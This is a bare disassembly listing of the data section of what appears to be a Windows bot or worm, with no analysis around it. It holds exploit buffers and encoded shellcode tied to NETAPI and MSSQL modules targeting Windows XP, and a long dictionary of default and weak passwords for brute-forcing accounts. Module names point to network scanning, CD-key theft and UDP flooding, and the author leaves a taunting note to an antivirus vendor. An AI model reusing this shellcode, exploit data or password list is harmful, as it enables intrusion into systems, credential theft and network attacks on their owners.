dword_425230	dd 400h			; DATA XREF: sub_411F29:loc_4122CDr
					; sub_411F29+44Dr
dword_425234	dd 0FFFFFC01h		; DATA XREF: sub_411F29:loc_412098r
dword_425238	dd 35h			; DATA XREF: sub_411F29+78r
					; sub_411F29+176r ...
dword_42523C	dd 0Bh			; DATA XREF: sub_411F29:loc_412234r
					; sub_411F29+3AAr ...
dword_425240	dd 40h			; DATA XREF: sub_411F29+519r
dword_425244	dd 3FFh			; DATA XREF: sub_411F29+452r
					; sub_411F29:loc_41238Cr
dword_425248	dd 80h			; DATA XREF: sub_41246B:loc_41280Fr
					; sub_41246B+44Dr
dword_42524C	dd 0FFFFFF81h		; DATA XREF: sub_41246B:loc_4125DAr
dword_425250	dd 18h			; DATA XREF: sub_41246B+78r
					; sub_41246B+176r ...
dword_425254	dd 8			; DATA XREF: sub_41246B:loc_412776r
					; sub_41246B+3AAr ...
dword_425258	dd 20h			; DATA XREF: sub_41246B+519r
dword_42525C	dd 7Fh			; DATA XREF: sub_41246B+452r
					; sub_41246B:loc_4128CEr
dword_425260	dd 2 dup(0)		; DATA XREF: sub_4129AD+363o
					; sub_413071+18Eo
		dd 4002A000h, 2	dup(0)
		dd 4005C800h, 2	dup(0)
		dd 4008FA00h, 2	dup(0)
		dd 400C9C40h, 2	dup(0)
		dd 400FC350h, 2	dup(0)
		dd 4012F424h, 0
		dd 80000000h, 40169896h, 0
		dd 20000000h, 4019BEBCh, 0
		dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
		dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
		dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
		dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh,	40D3C278h
		dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
		dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
		dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
		dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h,	0A0AEA60Eh
		dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
		dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
		dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h,	5D25D88Bh
		dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
		dd 52028A20h, 7525C460h, 0
dword_4253C0	dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
					; DATA XREF: sub_4129AD+37Ao
					; sub_413071+1B3o
		dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h,	652CD3C3h
		dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h,	3FEEA7C5h
		dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h,	94D5E57Ah
		dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh,	0E15B4C2Fh
		dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
		dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h,	313BBABCh
		dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h,	8D2FEED7h
		dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
		dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
		dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
		dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh,	3B03A686h
		dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h,	0EE32DB23h
		dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h,	11B268E2h
		dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
		dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh,	0BF3C9157h
		dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h,	9FDE2DE4h
		dd 4C8D2CEh, 0AD8A6DDh,	0
		dd offset aBadAllocation ; "bad	allocation"
		dd offset dword_41FF34+4
aNetapi		db 'NETAPI',0           ; DATA XREF: .text:00402525o
					; .text:0040256Cr ...
		align 10h
		dd 6 dup(0)
dword_425548	dd 8Bh			; DATA XREF: .text:004028A2r
					; sub_402AA2+77r ...
dword_42554C	dd 0			; DATA XREF: sub_402AA2:loc_402AF3r
					; sub_41B13F+A8r ...
off_425550	dd offset sub_41B423	; DATA XREF: sub_413FED+1FEr
					; sub_413FED+301r ...
aMssql		db 'MSSQL',0
		align 4
		dd 6 dup(0)
		dd 599h, 0
		dd offset sub_41BB5A
		dd 4D5953h, 7 dup(0)
		dd 0B97h, 0
		dd offset sub_41B13F
		dd 0Bh dup(0)
		dd offset aBadAllocatio_0 ; "bad allocation"
		dd offset aBadAllocatio_1 ; "bad allocation"
dword_4255E0	dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_41B13F+7Fo
		dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
		dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
		dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh	dup(64646464h)
		dd 1016464h, 40h dup(65656565h), 66010165h, 40h	dup(66666666h)
		dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
		dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
		dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
		dd 6C6C6C01h, 8	dup(6C6C6C6Ch),	41416C6Ch, 100D06EBh, 6D6D501Eh
		dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
		dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
		dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
		dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h,	0AF5B8DF3h
		dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
		dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
		dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
		dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h,	85773449h
		dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh,	0D43C8A9Bh
		dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh,	78281EB8h
		dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
		dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
		dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
		dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h,	2C47A345h
		dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
		dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
		dd 4838E43h, 5180BD0Ch,	0EFAF269Ah, 0D87B5338h,	78A9269Bh
		dd 877FD918h
aMmmmmmmmmmmmmm	db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
		align 4
byte_4267F4	db 0			; DATA XREF: sub_414D82:loc_414E56r
					; sub_414D82:loc_414F6Fr
a__		db 0Ah
		db 0Dh,'\_/.',0
dword_4267FC	dd 0EFFFC481h, 44FFFFh,	41FF94h	; DATA XREF: sub_41B423+321o
dword_426808	dd 42Ah			; DATA XREF: sub_41B423+2CBr
dword_42680C	dd 3E8h			; DATA XREF: sub_41B423+462r
dword_426810	dd 258h			; DATA XREF: sub_41B423+318r
		dd offset aWindowsXpSp0Sp ; "Windows XP	(SP0+SP1)"
		dd 2C6h, 264h, 0
dword_426824	dd 20804h		; DATA XREF: sub_41B423+47Br
					; sub_41B423+487r ...
		dd offset aBadAllocatio_2 ; "bad allocation"
		dd offset aBadAllocatio_3 ; "bad allocation"
off_426830	dd offset byte_41FF2B	; DATA XREF: sub_41BB5A:loc_41BC37r
					; sub_41BB5A+EEo
		dd offset aAdministrator ; "administrator"
		dd offset aAdministrador ; "administrador"
		dd offset aAdministrateur ; "administrateur"
		dd offset aAdministrat	; "administrat"
		dd offset aAdmins	; "admins"
		dd offset aAdmin_0	; "admin"
		dd offset aAdm		; "adm"
		dd offset aPassword1	; "password1"
		dd offset aPassword	; "password"
		dd offset aPasswd	; "passwd"
		dd offset aPass1234	; "pass1234"
		dd offset aPass		; "pass"
		dd offset aPwd		; "pwd"
		dd offset a007		; "007"
		dd offset a1		; "1"
		dd offset a12		; "12"
		dd offset a123		; "123"
		dd offset a1234		; "1234"
		dd offset a12345	; "12345"
		dd offset a123456	; "123456"
		dd offset a1234567	; "1234567"
		dd offset a12345678	; "12345678"
		dd offset a123456789	; "123456789"
		dd offset a1234567890	; "1234567890"
		dd offset a2000		; "2000"
		dd offset a2001		; "2001"
		dd offset a2002		; "2002"
		dd offset a2003		; "2003"
		dd offset a2004		; "2004"
		dd offset aTest		; "test"
		dd offset aGuest	; "guest"
		dd offset aNone		; "none"
		dd offset aDemo		; "demo"
		dd offset aUnix		; "unix"
		dd offset aLinux	; "linux"
		dd offset aChangeme	; "changeme"
		dd offset aDefault	; "default"
		dd offset aSystem_0	; "system"
		dd offset aServer	; "server"
		dd offset aRoot_0	; "root"
		dd offset aNull_1	; "null"
		dd offset aQwerty	; "qwerty"
		dd offset aMail		; "mail"
		dd offset aOutlook	; "outlook"
		dd offset aWeb		; "web"
		dd offset aWww		; "www"
		dd offset aInternet	; "internet"
		dd offset aAccounts	; "accounts"
		dd offset aAccounting	; "accounting"
		dd offset aHome		; "home"
		dd offset aHomeuser	; "homeuser"
		dd offset aUser		; "user"
		dd offset aOem		; "oem"
		dd offset aOemuser	; "oemuser"
		dd offset aOeminstall	; "oeminstall"
		dd offset aWindows	; "windows"
		dd offset aWin98	; "win98"
		dd offset aWin2k	; "win2k"
		dd offset aWinxp	; "winxp"
		dd offset aWinnt	; "winnt"
		dd offset aWin2000	; "win2000"
		dd offset aQaz		; "qaz"
		dd offset aAsd		; "asd"
		dd offset aZxc		; "zxc"
		dd offset aQwe		; "qwe"
		dd offset aBob		; "bob"
		dd offset aJen		; "jen"
		dd offset aJoe		; "joe"
		dd offset aFred		; "fred"
		dd offset aBill		; "bill"
		dd offset aMike		; "mike"
		dd offset aJohn		; "john"
		dd offset aPeter	; "peter"
		dd offset aLuke		; "luke"
		dd offset aSam		; "sam"
		dd offset aSue		; "sue"
		dd offset aSusan	; "susan"
		dd offset aPeter_0	; "peter"
		dd offset aBrian	; "brian"
		dd offset aLee		; "lee"
		dd offset aNeil		; "neil"
		dd offset aIan		; "ian"
		dd offset aChris	; "chris"
		dd offset aEric		; "eric"
		dd offset aGeorge	; "george"
		dd offset aKate		; "kate"
		dd offset aBob_0	; "bob"
		dd offset aKatie	; "katie"
		dd offset aMary		; "mary"
		dd offset aLogin	; "login"
		dd offset aLoginpass	; "loginpass"
		dd offset aTechnical	; "technical"
		dd offset aBackup	; "backup"
		dd offset aExchange	; "exchange"
		dd offset aFuck		; "fuck"
		dd offset aBitch	; "bitch"
		dd offset aSlut		; "slut"
		dd offset aSex		; "sex"
		dd offset aGod		; "god"
		dd offset aHell		; "hell"
		dd offset aHello	; "hello"
		dd offset aDomain	; "domain"
		dd offset aDomainpass	; "domainpass"
		dd offset aDomainpassword ; "domainpassword"
		dd offset aDatabase	; "database"
		dd offset aAccess	; "access"
		dd offset aDbpass	; "dbpass"
		dd offset aDbpassword	; "dbpassword"
		dd offset aDatabasepass	; "databasepass"
		dd offset aData		; "data"
		dd offset aDatabasepasswo ; "databasepassword"
		dd offset aDb1		; "db1"
		dd offset aDb2		; "db2"
		dd offset aDb1234	; "db1234"
		dd offset aSa_0		; "sa"
		dd offset aSql		; "sql"
		dd offset aSqlpassoainsta ; "sqlpassoainstall"
		dd offset aOrainstall	; "orainstall"
		dd offset aOracle	; "oracle"
		dd offset aIbm		; "ibm"
		dd offset aCisco	; "cisco"
		dd offset aDell		; "dell"
		dd offset aCompaq	; "compaq"
		dd offset aSiemens	; "siemens"
		dd offset aHp		; "hp"
		dd offset aNokia	; "nokia"
		dd offset aXp		; "xp"
		dd offset aControl	; "control"
		dd offset aOffice	; "office"
		dd offset aBlank	; "blank"
		dd offset aWinpass	; "winpass"
		dd offset aMain		; "main"
		dd offset aLan		; "lan"
		dd offset aInternet_0	; "internet"
		dd offset aIntranet	; "intranet"
		dd offset aStudent	; "student"
		dd offset aTeacher	; "teacher"
		dd offset aStaff	; "staff"
		align 10h
		dd offset aBadAllocatio_4 ; "bad allocation"
		dd offset aBadAllocatio_5 ; "bad allocation"
		dd offset aBadAllocatio_6 ; "bad allocation"
		dd offset aBadAllocatio_7 ; "bad allocation"
		dd offset aBadAllocatio_8 ; "bad allocation"
		dd offset aBadAllocatio_9 ; "bad allocation"
		dd offset aBadAllocati_10 ; "bad allocation"
		dd offset aBadAllocati_11 ; "bad allocation"
dword_426A80	dd 22B1C933h, 74D9EED9h, 805BF424h, 8000146Bh, 8300156Bh
					; DATA XREF: sub_414D82+7Do
		dd 0F3E2FEEBh, 0
dword_426A9C	dd 22B1C933h, 74D9EED9h, 805BF424h, 80001473h, 83001573h
					; DATA XREF: sub_414D82+192o
		dd 0F3E2FEEBh, 0
dword_426AB8	dd 758B54EBh, 35748B3Ch, 56F50378h, 320768Bh, 49C933F5h
					; DATA XREF: sub_414FA3+37o
		dd 0DB33AD41h, 14BE0F36h, 74F23828h, 0DCBC108h,	0EB40DA03h
		dd 75DF3BEFh, 5E8B5EE7h, 66DD0324h, 8B4B0C8Bh, 0DD031C5Eh
		dd 38B048Bh, 7275C3C5h,	6E6F6D6Ch, 6C6C642Eh, 5C3A4300h
		dd 78652E55h, 0C0330065h, 30400364h, 408B0C78h,	1C708B0Ch
		dd 8408BADh, 408B09EBh,	7C408D34h, 953C408Bh, 0E4E8EBFh
		dd 0FF84E8ECh, 0EC83FFFFh, 242C8304h, 95D0FF3Ch, 1A36BF50h
		dd 6FE8702Fh, 8BFFFFFFh, 8DFC2454h, 0DB33BA52h,	0EB525353h
		dd 0D0FF5324h, 0FE98BF5Dh, 53E80E8Ah, 83FFFFFFh, 2C8304ECh
		dd 0D0FF6224h, 0E0CEEFBFh, 0FF40E860h, 0FF52FFFFh, 0FFD7E8D0h
		dd 0FFFFh, 0
		dd 0FF000000h, 0FFFF0000h, 0FFFFFF00h, 80000000h, 800000h
		dd 8000h, 80h, 421278h
dword_426BA8	dd 0			; DATA XREF: sub_417760+6Er
dword_426BAC	dd 0			; DATA XREF: sub_417760+75r
		dd 0
		dd 0FF000000h, 0
		dd 0FFFF0000h, 0
		dd 0FFFFFF00h, 0
		dd 0FFFFFFFFh, 0FF000000h, 0FFFFFFFFh, 0FFFF0000h, 0FFFFFFFFh
		dd 0FFFFFF00h, 0FFFFFFFFh
dword_426BE8	dd 0			; DATA XREF: sub_417760+8Br
dword_426BEC	dd 80000000h		; DATA XREF: sub_417760+91r
		dd 0
		dd 800000h, 0
		dd 8000h, 0
		dd 80h,	80000000h, 0
		dd 800000h, 0
		dd 8000h, 0
		dd 80h,	0
		dd offset dword_421278+10h
		dd offset aBadAllocati_12 ; "bad allocation"
aIuvPPdPdx	db 'ϏяϏ',0     ; DATA XREF: sub_41C7BA+41Do
		align 10h
		dd 7Ch dup(0)
dword_426E30	dd 80h dup(0)		; DATA XREF: sub_41C7BA+418o
word_427030	dw 593h			; DATA XREF: sub_41C7BA:loc_41CBCAr
		align 8
aSsolbzvcofuwrk	db 'SsOlbZVCofUWrKFh',0 ; DATA XREF: sub_41A33D:loc_41A368o
					; sub_41A33D+44r
		align 4
		dd 1Bh dup(0)
aSiU		db '‘ғ',0        ; DATA XREF: sub_4184BD+2A9o
					; sub_4184BD+375o ...
		align 4
		dd 3Dh dup(0)
dword_4271B8	dd 6 dup(0)		; DATA XREF: sub_4184BD+2FFo
					; sub_4184BD+38Fo
byte_4271D0	db 2Eh			; DATA XREF: sub_4182F6+E4r
byte_4271D1	db 0CCh, 99h, 0		; DATA XREF: sub_4184BD+3A5o
		dd 0Dh dup(0)
		db 0
aDfsiouiabTmokd	db 'ϒ̃ς',0 ; DATA XREF: sub_4184BD+611o
		align 4
		dd 8 dup(0)
		db 0
aDfstcvDsd	db 'τ',0       ; DATA XREF: sub_401DED+60o
					; sub_417C06+B8o ...
		dd 1Dh dup(0)
		db 0
aDIoIa		db '',0         ; DATA XREF: sub_41C7BA+2C2o
		align 4
		dd 0Bh dup(0)
		db 0
aDDucivd	db '',0      ; DATA XREF: sub_417C06+A4o
					; sub_417D99+7Co ...
		align 10h
		dd 3Dh dup(0)
dword_427404	dd 8			; DATA XREF: sub_41810B+174r
					; sub_41810B+1B1r
word_427408	dw 0D8Bh		; DATA XREF: sub_401EF9:loc_401FADr
byte_42740A	db 1			; DATA XREF: sub_40177B+8Fr
					; sub_4019F3+8Fr
		align 4
		dd offset aBadAllocati_13 ; "bad allocation"
aEvZgEGGeAeeGgZ	db 'Хاեңأؠգקԣӣ֣ѠҢҢңפؤ֧'
					; DATA XREF: sub_40177B+7Co
		db 'إקף֤ҥקפӣפդѤӣ֠',0
		dd 71h dup(0)
aDDAVvAEzEAZvvD	db 'ФԤؠҢ٠ԥԥ٠ҧԤեբף٢ԣ'
					; DATA XREF: sub_4019F3+7Co
		db '֠ӣңӠ٠ӤӧؠТҧӤҠԥ֧֧Ӥ',0
		dd 10h dup(0)
aPivk		db '',0             ; DATA XREF: sub_418CAF+216o
					; sub_418F1C+27o
		align 4
		db 0
aA		db '',0             ; DATA XREF: sub_418CAF+13Eo
		align 10h
		db 2 dup(0)
aD		db '',0             ; DATA XREF: sub_418CAF+227o
		align 4
		db 3 dup(0)
aIpj		db '',0             ; DATA XREF: sub_4184BD+1CFo
		dd 0
aOpj		db '',0             ; DATA XREF: sub_4184BD+22Fo
		align 4
		db 0
aKivk		db '',0             ; DATA XREF: sub_4184BD+1DFo
		align 4
		db 2 dup(0)
aLoip		db '',0             ; DATA XREF: sub_4184BD+2ECo
					; sub_4184BD+355o
		align 4
		db 3 dup(0)
aMoed		db '',0             ; DATA XREF: sub_4184BD+365o
		align 8
aIMJ		db '',0          ; DATA XREF: sub_417FE1+A4o
					; sub_4184BD+1EFo
		dd 2 dup(0)
aIxxsCccUioxgud	db 'ΖϓςΓ΍τ',0 ; DATA XREF: sub_41B423+404o
aDearSymantecFo	db 'Dear Symantec: For years I have longed for just one thing, to mak'
		db 'e malware with just the right sting, you detected my creation and'
		db ' got my domains killed, but I will not stop, I can rebuild. P.S. '
		db 'Fuck you assholes.',0
		align 4
		dd offset aBadAllocati_14 ; "bad allocation"
dword_42786C	dd 5348h, 421668h, 421684h, 42186Ch, 42187Ch, 4218B0h
					; DATA XREF: sub_4198C0+20o
					; sub_4198C0+8Eo
		dd 4218C0h, 4218D8h
dword_42788C	dd 80000002h, 80000001h, 421BF0h ; DATA	XREF: sub_41A70B+6Bo
dword_427898	dd 0CA975201h, 0A811D059h, 0D5h, 1Dh dup(0) ; DATA XREF: sub_41A53E+3Do
		dd 9, 0C5C1371Dh, 6379AB46h, 8Fh, 1Dh dup(0)
		dd 9, 7D8AAFA8h, 0F4BE11C9h, 8,	1Dh dup(0)
		dd 9, 9F499642h, 0F537FD4Ah, 0D6h, 1Dh dup(0)
		dd 9, 123485E9h, 411291D9h, 12h, 1Dh dup(0)
		dd 9, 5EB02EBh,	0FFFFF9E8h, 0FFh, 1Dh dup(0)
		dd 9
off_427BB0	dd offset off_41E3AC	; DATA XREF: jlrllt49:00422194o
					; jlrllt49:004221B4o
		align 8
a_?avclsmodule@	db '.?AVclsModule@@',0
off_427BC8	dd offset off_41E3AC	; DATA XREF: jlrllt49:004221DCo
					; jlrllt49:00422204o ...
		align 10h
a_?avlength_err	db '.?AVlength_error@std@@',0
		align 4
off_427BE8	dd offset off_41E3AC	; DATA XREF: jlrllt49:0042222Co
					; jlrllt49:00422250o ...
		align 10h
a_?avlogic_erro	db '.?AVlogic_error@std@@',0
		align 4
off_427C08	dd offset off_41E3AC	; DATA XREF: jlrllt49:004220ECo
					; jlrllt49:0042229Co ...
		align 10h
a_?avexception@	db '.?AVexception@std@@',0
off_427C24	dd offset off_41E3AC	; DATA XREF: jlrllt49:00422278o
					; jlrllt49:004222D0o ...
		dd 0
a_?avbad_alloc@	db '.?AVbad_alloc@std@@',0
off_427C40	dd offset off_41E3AC	; DATA XREF: jlrllt49:004222F8o
					; jlrllt49:0042231Co
		align 8
a_?avmdlupd@@	db '.?AVmdlUPD@@',0
		align 4
off_427C58	dd offset off_41E3AC	; DATA XREF: jlrllt49:00422344o
					; jlrllt49:00422368o
		align 10h
a_?avmdldl@@	db '.?AVmdlDL@@',0
off_427C6C	dd offset off_41E3AC	; DATA XREF: jlrllt49:00422390o
					; jlrllt49:004223B4o
		dd 0
a_?avmdlipt@@	db '.?AVmdlIPT@@',0
		align 4
off_427C84	dd offset off_41E3AC	; DATA XREF: jlrllt49:004223DCo
					; jlrllt49:00422400o
		dd 0
a_?avmdlijn@@	db '.?AVmdlIJN@@',0
		align 4
off_427C9C	dd offset off_41E3AC	; DATA XREF: jlrllt49:00422428o
					; jlrllt49:0042244Co
		dd 0
a_?avmdliquit@@	db '.?AVmdlIQUIT@@',0
		align 4
off_427CB4	dd offset off_41E3AC	; DATA XREF: jlrllt49:00422474o
					; jlrllt49:00422498o
		dd 0
a_?avmdlcdkey@@	db '.?AVmdlCDKey@@',0
		align 4
off_427CCC	dd offset off_41E3AC	; DATA XREF: jlrllt49:004224C0o
					; jlrllt49:004224E4o
		dd 0
a_?avmdlhttpinf	db '.?AVmdlHTTPInfo@@',0
		align 4
off_427CE8	dd offset off_41E3AC	; DATA XREF: jlrllt49:0042250Co
					; jlrllt49:00422530o
		align 10h
a_?avmdluptime@	db '.?AVmdlUptime@@',0
off_427D00	dd offset off_41E3AC	; DATA XREF: jlrllt49:00422558o
					; jlrllt49:0042257Co
		align 8
a_?avmdls4stop@	db '.?AVmdlS4Stop@@',0
off_427D18	dd offset off_41E3AC	; DATA XREF: jlrllt49:004225A4o
					; jlrllt49:004225C8o
		align 10h
a_?avmdls4@@	db '.?AVmdlS4@@',0
off_427D2C	dd offset off_41E3AC	; DATA XREF: jlrllt49:004225F0o
					; jlrllt49:00422614o
		dd 0
a_?avmdlnetinfo	db '.?AVmdlNetInfo@@',0
		align 4
off_427D48	dd offset off_41E3AC	; DATA XREF: jlrllt49:0042263Co
					; jlrllt49:00422660o
		align 10h
a_?avmdlsysinfo	db '.?AVmdlSysInfo@@',0
		align 4
off_427D64	dd offset off_41E3AC	; DATA XREF: jlrllt49:00422688o
					; jlrllt49:004226ACo
		dd 0
a_?avmdludp@@	db '.?AVmdlUDP@@',0
		align 4
off_427D7C	dd offset off_41E3AC	; DATA XREF: jlrllt49:004226D4o
					; jlrllt49:004226F8o
		dd 0
a_?avmdlscansta	db '.?AVmdlScanStats@@',0
		align 4
off_427D98	dd offset off_41E3AC	; DATA XREF: jlrllt49:00422720o
					; jlrllt49:00422744o
		align 10h
a_?avmdlscansto	db '.?AVmdlScanStop@@',0
		align 4
off_427DB4	dd offset off_41E3AC	; DATA XREF: jlrllt49:0042276Co
					; jlrllt49:00422790o
		dd 0
a_?avmdlscanner	db '.?AVmdlScanner@@',0
		align 10h
		dd 4 dup(0)
dword_427DE0	dd 0			; DATA XREF: sub_4033C1+4w
					; sub_4034C7+3r
dword_427DE4	dd 0			; DATA XREF: sub_4035D9+2Bo
					; .text:loc_41D275w ...
		align 10h
dword_427DF0	dd 0			; DATA XREF: sub_4035D9:loc_4035FDr
					; sub_4035D9+32w
dword_427DF4	dd 0			; DATA XREF: .text:0040461Fw
					; sub_40B1A1:loc_40B1B3r ...
		dd 0
dword_427DFC	dd 0			; DATA XREF: sub_40449Dr
					; sub_40FC82+15r ...
dword_427E00	dd 0			; DATA XREF: sub_404C4E+8Fw
					; jlrllt49:off_41E418o
dword_427E04	dd 0			; DATA XREF: sub_404C4E+99w
		dd 0
dword_427E0C	dd 0			; DATA XREF: sub_404C4E+8Aw
		dd 10h dup(0)
dword_427E50	dd 0			; DATA XREF: sub_404C4E+BFw
					; sub_404C4E+DFr
		align 8
dword_427E58	dd 0			; DATA XREF: sub_404C4E+7Bw
					; jlrllt49:0041E41Co
		dd 22h dup(0)
word_427EE4	dw 0			; DATA XREF: sub_404C4E+4Fw
		align 4
word_427EE8	dw 0			; DATA XREF: sub_404C4E+48w
		align 4
word_427EEC	dw 0			; DATA XREF: sub_404C4E+41w
		align 10h
word_427EF0	dw 0			; DATA XREF: sub_404C4E+3Aw
		align 4
dword_427EF4	dd 0			; DATA XREF: sub_404C4E+26w
dword_427EF8	dd 0			; DATA XREF: sub_404C4E+20w
dword_427EFC	dd 0			; DATA XREF: sub_404C4E+1Aw
dword_427F00	dd 0			; DATA XREF: sub_404C4E+14w
dword_427F04	dd 0			; DATA XREF: sub_404C4E+Ew
dword_427F08	dd 0			; DATA XREF: sub_404C4E+9w
dword_427F0C	dd 0			; DATA XREF: sub_404C4E+60w
dword_427F10	dd 0			; DATA XREF: sub_404C4E+68w
					; sub_404C4E+85r
word_427F14	dw 0			; DATA XREF: sub_404C4E+33w
		align 4
dword_427F18	dd 0			; DATA XREF: sub_404C4E+57w
dword_427F1C	dd 0			; DATA XREF: sub_404C4E+70w
word_427F20	dw 0			; DATA XREF: sub_404C4E+2Cw
		align 4
		dd 80h dup(0)
dword_428124	dd 0			; DATA XREF: sub_405004+15w
					; sub_405004+1Dw ...
word_428128	dw 0			; DATA XREF: sub_405229+E7w
		align 4
		dd 2 dup(0)
dword_428134	dd 4E4h			; DATA XREF: sub_405229+C3w
dword_428138	dd 0			; DATA XREF: sub_405229+CBw
dword_42813C	dd 0			; DATA XREF: sub_405229+D3w
dword_428140	dd 0			; DATA XREF: sub_402E37+6r
					; sub_402F77+6r ...
		dd 8 dup(0)
off_428164	dd offset sub_4057B6	; DATA XREF: sub_405A96+30w
					; sub_405A96+51r ...
